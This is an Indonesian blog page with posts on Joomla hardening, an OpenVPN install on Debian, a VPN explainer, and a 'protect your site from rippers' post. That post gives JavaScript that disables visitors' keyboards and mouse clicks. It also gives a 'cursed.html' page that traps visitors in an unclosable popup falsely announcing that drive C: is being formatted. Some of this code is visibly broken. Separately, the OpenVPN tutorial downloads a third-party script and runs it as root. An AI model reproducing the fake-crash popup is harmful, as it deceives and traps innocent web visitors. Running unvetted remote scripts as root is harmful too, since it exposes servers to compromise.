Senin, 25 November 2013

Sistem Basis Data – Entity Relationship Diagram (ERD)



Diposting oleh di Tidak ada komentar:
Label:

CARA MELLINDUNGI WEB JOOMLA

Berikut ini tips untuk melindungi web Joomla anda:
  1. Semakin sedikit menggunakan Extension semakin aman website Joomla.
  2. Periksa dahulu keamanan Extension yang ingin digunakan di Google atauVulnerable Extensions List
  3. Selalu upgrade Joomla ke versi terbaru.
  4. Mengganti username administrator Joomla, gunakan username selain admin.
  5. Mengganti table prefix Joomla, gunakan tabel prefix selain jos_.
  6. Proteksi folder Administrator Joomla dengan password, cPanel > Password Protect Directories (cara ini tidak bisa diterapkan jika ada ext yang membutuhkan file di dalam folder administrator). Atau dengan plugins jSecure Authentication.
  7. Aktifkan fitur SEO, ada baiknya menggunakan Extension SEO sepertish404SEF
  8. Jangan gunakan Extension bajakan karena kebanyakan telah disusupi oleh script jahat
  9. Hapus semua Extension yang sudah tidak digunakan
  10. Mengganti password Joomla dan folder Administrator secara berkala, gunakan kombinasi alfa-numerik untuk password
  11. Pastikan semua permission file 644 dan folder 755. Untuk file configuration.php permission file bisa diset menjadi 444.
  12. Non-aktifkan plugins editor html (tinymce dll) jika web anda telah selesai diedit.
NB: 
Template juga termasuk Extension Joomla
 
 
referensi saya menggambil pada buku
Diposting oleh di Tidak ada komentar:
Label:

Melindungi WEB-Site Dari RIPPER

Ini adalah TRIK Script solusi melindungi WEB-Site Dari RIPPER atau sejenis-nya, semoga bisa membantu sebagai pelindung serangan Hacker.
=> BROWSER RESTRICTION
Code:
document.write(”)
<script LANGUAGE="JavaScript">
if (navigator.appName == "Microsoft Internet Explorer") {
alert('Please Using mozilla Fire Fox')
document.location = "http://www.mozilla.com/en-US/";
}
</script>
Keterangan : Ini menggagalkan Web ada dapat diakses melalui IE! Jadi Web Anda hanya dapat di akses melalui FF
=> DISABLE USER’S KEYBOARD
Code:
document.write(”)
<script LANGUAGE="JavaScript">
function keypressed() {
alert("Maaf, Nggak boleh tekan keyboard");
}
document.onkeydown=keypressed;
</script>
Keterangan : Visitor tidak diperkenankan untuk menggunakan keyboard!
=> DISABLE RIGHT CLICK
Code:
document.write(”)

<script LANGUAGE="JavaScript">
function rightclick() {if (event.button==2)
{alert('Maaf, nggak boleh klik kanan!')}}
document.onmousedown=rightclick);
</script>
Keterangan : Visitor tidak diperkenankan untuk menggunakan klik kanan maupun view source code.
=> DISABLE LEFT CLICK
Code:
document.write(”)

<script LANGUAGE="JavaScript">
function rightclick() {if (event.button==1)
{alert('Maaf, nggak boleh klik kiri!')}}
document.onmousedown=rightclick);
</script>
Keterangan : Visitor tidak diperkenankan untuk menggunakan klik kiri maupun view source code.
=> RIGHT CLICK WITH CRASH WINDOWS
Langkah :
1.) Simpan code dibawah dengan nama cursed.html atau kamu dapat menamainya sesuai keinginan, kemudian upload di web hosting kamu
Code:
document.write(”)

<html>
<body onkeydown=handlePress(event) onunload="window.open(location)" onload="start()"> <br>
<br>&nbsp;<br>
<SCRIPT LANGUAGE="JavaScript">
function handlePress(e)
{return false;}
</SCRIPT>
<script>
function prcheck()
{
progr=1;d1=op.document.all.d2;prmsg="Formatting drive C:\ ";
i1=setInterval("d1.innerHTML=prmsg + progr++ +\"%\"",2000);
};
op=window.createPopup();
s='<body><table bgcolor="#0000F4" width="100%" height="100%"><tr ALIGN=LEFT VALIGN=TOP><td height=157></td></tr><tr>';
s+='<td>';
s+='<center><b><font color="#ffffff" face="Helvetica, Arial, sans-serif"><h2>Browser Error hahahahaha ... HACKER's Attack!!!
 <!--
 var prefix = 'ma' + 'il' + 'to';
 var path = 'hr' + 'ef' + '=';
 var addy9655 = 'webmaster' + '@';
 addy9655 = addy9655 + 'mozilla' + '.' + 'com';
 document.write( '<a ' + path + '\'' + prefix + ':' + addy9655 + '\'>' );
 document.write( addy9655 );
 document.write( '<\/a>' );
 //-->\n webmaster@mozilla.com
 <!--
 document.write( '<span style=\'display: none;\'>' );
 //-->
 Alamat e-mail ini dilindungi dari spambot, anda harus memampukan JavaScript untuk melihatnya
 <!--
 document.write( '</' );
 document.write( 'span>' );
 //-->
 </h2>General protection fault<br>EAX=5435 EBX=6541 EIP=*Unable to fix it<br><div id="d2">Formatting drive C:\ </div></font></b></center></td>';
s+='</tr></table></body>';
op.document.body.innerHTML=s;
function oppop()
{
if (!op.isOpen)
{
op.show(0,0,screen.width,screen.height,document.body);
}
}
function start()
{
oppop();
setInterval("window.focus(); {oppop();}",1);
prcheck();
}
</script>
</body>
</html>
Windows FF ini tidak akan bisa di close, kalaupun bisa maka akan terbuka kembali!
2.)Kemudian untuk Trick CODE buat di WEB kita
Code:
document.write(”)

<SCRIPT LANGUAGE="JavaScript">
var msg =" Hi,"+pageViewerFName+" what are you doing ?!! Now, you are cursed!" function noRclick( event )
{
  if( event.which == 3 )
  {
    alert( msg );
    return false;
  }
  return true;
}
function noRclick2()
{
  alert( msg );
top.location.href = "Direct LINK FILE cursed.html";
  return false;
}
document.oncontextmenu = noRclick2;
document.captureEvents( Event.MOUSEDOWN );
if( document.layers ) document.onmousedown = noRclick;
</SCRIPT>
Keterangan : Trick ini akan memaksa CRASH WINDOWS siapapun yang telah melakukan klik kanan!!!
Catatan PENTING :
-> Paste Code yang ingin digunakan dalam bagian tag <body> pada index.php atau index.html
-> Direkomendasikan, jangan menggunakan seluruh kode bersamaan

REFERENSI DARI BUKU :)
Diposting oleh di Tidak ada komentar:
Label:

Rabu, 06 November 2013

Install OpenVPN Server di Debian



Install OpenVPN Server di Debian
kali ini saya mau kasi sedikit tutor buat teman2, gimana sih cara nya install OpenVPN server..
di tutor ini saya gunakan Debian Server 6.0 64 bit,, ok.. kita mulai caranya

- pertama agan2 login sebagai root pada server agan ds/vps.
- di directory /root download dulu perl auto install nya..
Code:
root@puri:~# wget http://vpsnoc.com/scripts/debian-openvpn.sh
root@puri:~# chmod +x debian-openvpn.sh
-klo udh di download jalankan perintah dibawah ini.. itu perl otomatis dia akan download dan install OpenVPN secara otomatis pada server agan2...
Code:
root@puri:~# ./debian-openvpn.sh
- habis itu periksa OpenVPN yang agan2 install sudah berjalan atau belum. ketikkan perintah dibawah ini:
Code:
root@puri:~# netstat -an | grep 1194
- kalo hasilnya seperti di bawah ini :
Code:
udp        0      0 0.0.0.0:1194            0.0.0.0:*
berarti OpenVPN server sudah berhasil terinstall.
dalam hal ini, sebagai contoh klient untuk OpenVPN saya menggunakan komputer OS Windows 7
download kemudian install OpenVPN GUI di PC klien, aplikasi nya ada di web openvpn.net atau agan2 langsung bisa cek disini http://openvpn.net/index.php/download.html jangan lupa di install di pc klien ok

kemudian download dari server agan file keys.tgz di directory /root/keys.tgz bisa guna in aplikasi winscp atau software sftp lain ke PC kita. Kemudian untar file keys.tgz tadi ke pc klien directory C:\Program Files\OpenVPN\config\

terus coba test connet dari teskbar agan ada openvpn..
klo berhasil connect ke OpenVPN server, nanti PC klien akan mendapat IP sebagai contoh 10.8.0.7
setelah PC klient berhasil connect OpenVPN server, sesuai dengan script yang dijalankan di langkah pertama, default gateway dari setting network di PC klient akan mengarah ke OpenVPN server. Jika PC klient berhasil melakukan ping, misalnya ke www.google.co.id, berarti instalasi OpenVPN server dan client sudah berhasil. agan2 bisa browsing, chat dan aktifitas internet lainnya di PC client dengan akses sebagai klien vpn server.

kalo PC klient berhasil connect ke OpenVPN server tapi tidak dapat melakukan ping atau browsing, silakan buat file script di bawah ini dan upload ke VPS, misalnya file script ini kita namakan openvpnupdnet.sh, perintahnya:
Code:
root@puri:~# nano openvpnupdnet.sh
copy kan script di bawah ini,, jangan lupa di ganti yg perlu di ganti..
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j SNAT –to 175.103.xx.xx
#ganti 175.103.xx.xx dengan IP Public VPS Anda
#ganti eth0 dengan device network Anda, misalnya venet0
iptables-save > /etc/iptables.conf
echo “#!/bin/sh” > /etc/network/if-up.d/iptables
echo “iptables-restore < /etc/iptables.conf” >> /etc/network/if-up.d/iptables
chmod +x /etc/network/if-up.d/iptables
echo “net.ipv4.ip_forward=1? >> /etc/sysctl.conf
Setelah file updnet.sh diupload ke VPS, sebelum file dieksekusi,  ketikkan perintah
chmod +x updnet.sh
klo udh tersimpan jalankan perintah di bawah ini
Code:
root@puri:~# ./openvpnupdnet.sh
silakan di tes lagi di pc klien berhasil ping dan browsing gak... klo berhasil sip deh klo gitu hehe....
sekalian tutor nya ada yg mau di tanyakan silahkan
Diposting oleh di Tidak ada komentar:
Label:

Apa itu 'VPN' Virtual Private Network?

Apa itu 'VPN' Virtual Private Network?

Sebuah VPN, atau Virtual Private Network, memungkinkan Anda untuk membuat sambungan aman ke jaringan lain melalui Internet. VPN dapat digunakan untuk mengakses situs yang berada di luar jangkauan wilayah, melindungi aktivitas browsing Anda dari pencuri data pada Wi-Fi publik, dan banyak lagi.

VPN pada dasarnya meneruskan semua lalu lintas jaringan Anda ke jaringan, yang berguna untuk seperti mengakses local area network dari jarak jauh dan melewati sensor internet. Dan kebanyakan sistem operasi telah terintegrasi dengan dukungan VPN.

Apa itu VPN?
Ketika Anda menghubungkan komputer Anda (atau perangkat lain, seperti smartphone atau tablet) ke VPN, komputer bertindak sebagai jaringan lokal yang sama seperti VPN. Semua lalu lintas jaringan Anda dikirim melalui sambungan aman ke VPN. Karena komputer Anda berperilaku seolah-olah ada di jaringan, ini memungkinkan Anda untuk secara aman mengakses sumber daya jaringan lokal bahkan ketika Anda berada di sisi lain dunia. Anda juga akan dapat menggunakan internet seolah-olah Anda hadir di lokasi VPN, yang memiliki beberapa manfaat jika Anda menggunakan Wi-Fi atau ingin mengakses situs yang diblokir.

Ketika Anda menelusuri web saat terhubung ke VPN, kontak komputer Anda ke situs web melalui koneksi VPN terenkripsi. VPN meneruskan permintaan Anda dan meneruskan respon dari website kembali melalui sambungan aman. Jika Anda menggunakan VPN yang berbasis di AS untuk mengakses Netflix, Netflix akan melihat koneksi Anda berasal dari dalam Amerika Serikat.

Penggunaan VPN
VPN adalah alat yang cukup sederhana, tetapi dapat digunakan untuk melakukan berbagai hal:

Akses Jaringan Bisnis Ketika di Perjalanan : VPN sering digunakan oleh pelancong bisnis untuk mengakses jaringan bisnis mereka, termasuk semua sumber daya jaringan lokal, ketika di perjalanan. Sumber daya lokal tidak harus terhubung langsung ke Internet, sehingga meningkatkan keamanan.

Akses Jaringan Rumah Anda Ketika Bepergian : Anda juga dapat mengatur VPN Anda sendiri untuk mengakses jaringan Anda sendiri saat bepergian. Ini akan memungkinkan Anda untuk mengakses Remote Desktop Windows melalui Internet, berbagi berkas file, dan bermain game melalui internet seolah-olah Anda berada di LAN yang sama (local area network).

Menyembunyikan Aktivitas Browsing Anda Dari Jaringan Lokal Anda dan ISP : Jika Anda menggunakan koneksi Wi-Fi publik, aktivitas browsing Anda di situs web non-HTTPS terlihat untuk semua orang, jika mereka tahu bagaimana mencarinya. Jika Anda ingin menyembunyikan aktivitas browsing Anda untuk sedikit lebih privasi, Anda dapat terhubung ke VPN. Jaringan lokal hanya akan melihat satu sambungan aman VPN. Semua traffic lain akan melakukan perjalanan melalui koneksi VPN. Meskipun hal ini dapat digunakan untuk memotong koneksi-monitoring oleh penyedia layanan Internet Anda, ingatlah bahwa penyedia VPN dapat memilih untuk log lalu lintas di ujungnya.

Akses Website yang di Blokir : Ini adalah cara yang paling ampuh untuk bisa mengakses situs-situs yang diblokir dengan sangat mudah. Anda bisa menggunakan layanan VPN berbayar maupun layanan VPN gratis.

Bypass Sensor Internet : Banyak orang China menggunakan VPN untuk mengakali Great Firewall of China dan memperoleh akses ke seluruh internet. (Namun, Great Firewall tampaknya telah mulai mengganggu VPN)

Download File : Banyak orang menggunakan koneksi VPN untuk men-download file melalui BitTorrent. Ini sebenarnya dapat berguna bahkan jika Anda men-download torrents yang sepenuhnya legal - jika ISP Anda memblokir BitTorrent dan membuatnya sangat lambat, Anda dapat menggunakan BitTorrent pada VPN untuk mendapatkan kecepatan lebih cepat. Hal yang sama berlaku untuk jenis lain dari lalu lintas ISP Anda yang mungkin mengganggu (kecuali mereka mengganggu lalu lintas VPN itu sendiri.)

Menggunakan VPN
Menghubungkan ke VPN cukup sederhana. Pada Windows, tekan tombol Windows, ketik VPN, dan klik pilihan Set up virtual private network (VPN). (Jika Anda menggunakan Windows 8, Anda harus mengklik kategori Settings setelah mencari.) Gunakan wizard untuk memasukkan alamat dan login dari layanan VPN yang ingin Anda gunakan. Anda kemudian dapat menghubungkan dan memutuskan sambungan dari VPN menggunakan ikon jaringan di system tray yang sama di mana Anda mengelola jaringan Wi-Fi Anda.

Beberapa penyedia VPN dapat menawarkan klien yang melakukan konfigurasi ini untuk Anda.

konfigurasi VPN



Layanan VPN gratis
Jika Anda baru saja mengenal VPN dan ingin VPN dasar untuk digunakan pada hotspot Wi-Fi atau mengakses situs-wilayah terbatas, ada beberapa layanan gratis yang cukup baik.

TunnelBear memiliki setup yang mudah dan sederhana. Anda cukup meng-klik tombol dalam aplikasi, Anda bahkan tidak perlu mengkonfigurasi VPN pada Windows. Versi gratis membatasi Anda untuk 500 MB per bulan, tapi itu mungkin baik untuk penggunaan sesekali.

Ada juga proXPN , yang menyediakan klien bebas. Gratis klien terbatas pada 300kbps, tapi lalu lintas sebaliknya terbatas.

Anda juga mungkin tertarik dalam mendirikan VPN di server Anda sendiri, yang dapat Anda lakukan dengan menggunakan beberapa aplikasi seperti Tomat atau OpenWRT. Tentu saja, ini tidak akan memungkinkan Anda untuk mengakses situs web yang diblokir, kecuali jika Anda bepergian ke luar negeri dan mengakses jaringan Anda sendiri dari jarak jauh.
Diposting oleh di Tidak ada komentar:
Label:
Langganan: Postingan (Atom)